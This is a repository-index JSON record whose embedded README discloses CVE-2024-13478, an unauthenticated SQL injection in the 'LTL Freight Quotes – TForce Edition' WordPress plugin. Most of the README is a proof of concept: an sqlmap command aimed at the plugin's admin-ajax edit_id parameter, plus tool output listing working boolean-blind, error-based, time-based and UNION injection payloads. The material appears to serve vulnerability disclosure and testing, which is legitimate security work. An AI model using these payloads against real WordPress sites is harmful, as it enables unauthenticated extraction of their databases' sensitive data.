{"id":25874303,"url":"https://github.com/randomrobbiebf/cve-2024-13478","last_synced_at":"2026-02-08T23:35:37.644Z","repository":{"id":278594415,"uuid":"936146349","full_name":"RandomRobbieBF/CVE-2024-13478","owner":"RandomRobbieBF","description":"LTL Freight Quotes – TForce Edition \u003c= 3.6.4 - Unauthenticated SQL Injection","archived":false,"fork":false,"pushed_at":"2025-02-20T15:50:35.000Z","size":3,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-09-22T14:02:25.009Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-02-20T15:50:10.000Z","updated_at":"2025-02-20T15:50:39.000Z","dependencies_parsed_at":"2025-02-20T16:39:48.497Z","dependency_job_id":"f9ea5847-a86b-4bc2-b73b-dda9db28b40b","html_url":"https://github.com/RandomRobbieBF/CVE-2024-13478","commit_stats":null,"previous_names":["randomrobbiebf/cve-2024-13478"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RandomRobbieBF/CVE-2024-13478","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-13478","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-13478/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-13478/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-13478/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2024-13478/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-13478/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29249494,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-08T22:49:53.206Z","status":"ssl_error","status_checked_at":"2026-02-08T22:49:51.384Z","response_time":57,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-03-02T09:19:46.866Z","updated_at":"2026-02-08T23:35:37.628Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2024-13478\nLTL Freight Quotes – TForce Edition \u003c= 3.6.4 - Unauthenticated SQL Injection\n\n# Description\n\nThe LTL Freight Quotes – TForce Edition plugin for WordPress is vulnerable to SQL Injection via the 'dropship_edit_id' and 'edit_id' parameters in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n\n## Details\n\n- **Type**: plugin\n- **Slug**: ltl-freight-quotes-ups-edition\n- **Affected Version**: 3.6.4\n- **CVSS Score**: 7.5\n- **CVSS Rating**: High\n- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n- **CVE**: CVE-2024-13478\n- **Status**: Active\n\nPOC\n---\n\n```\nsqlmap.py -u 'http://kubernetes.docker.internal:8929/wp-admin/admin-ajax.php' --data='action=en_wd_edit_warehouse\u0026edit_id=1\u0026wp_nonce=13db5f2e7d' --level=2 --dbms='MySQL '\n\n[*] starting @ 15:35:17 /2025-02-20/\n\n[15:35:18] [INFO] testing connection to the target URL\nsqlmap resumed the following injection point(s) from stored session:\n---\nParameter: edit_id (POST)\n    Type: boolean-based blind\n    Title: AND boolean-based blind - WHERE or HAVING clause\n    Payload: action=en_wd_edit_warehouse\u0026edit_id=1 AND 8084=8084\u0026wp_nonce=13db5f2e7d\n\n    Type: error-based\n    Title: MySQL \u003e= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)\n    Payload: action=en_wd_edit_warehouse\u0026edit_id=1 AND GTID_SUBSET(CONCAT(0x7170787171,(SELECT (ELT(3874=3874,1))),0x717a627171),3874)\u0026wp_nonce=13db5f2e7d\n\n    Type: time-based blind\n    Title: MySQL \u003e= 5.0.12 AND time-based blind (query SLEEP)\n    Payload: action=en_wd_edit_warehouse\u0026edit_id=1 AND (SELECT 8170 FROM (SELECT(SLEEP(5)))Gvfy)\u0026wp_nonce=13db5f2e7d\n\n    Type: UNION query\n    Title: Generic UNION query (NULL) - 20 columns\n    Payload: action=en_wd_edit_warehouse\u0026edit_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170787171,0x6e57584a4f524f56504572467179796c6a6c6c527872646a73464444414144707067736542565243,0x717a627171),NULL,NULL,NULL,NULL,NULL-- -\u0026wp_nonce=13db5f2e7d\n---\n[15:35:18] [INFO] testing MySQL\n[15:35:18] [INFO] confirming MySQL\n[15:35:18] [INFO] the back-end DBMS is MySQL\nweb server operating system: Linux Debian\nweb application technology: PHP 8.2.21, Apache 2.4.59\nback-end DBMS: MySQL \u003e= 8.0.0\n\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-13478","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2024-13478","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-13478/lists"}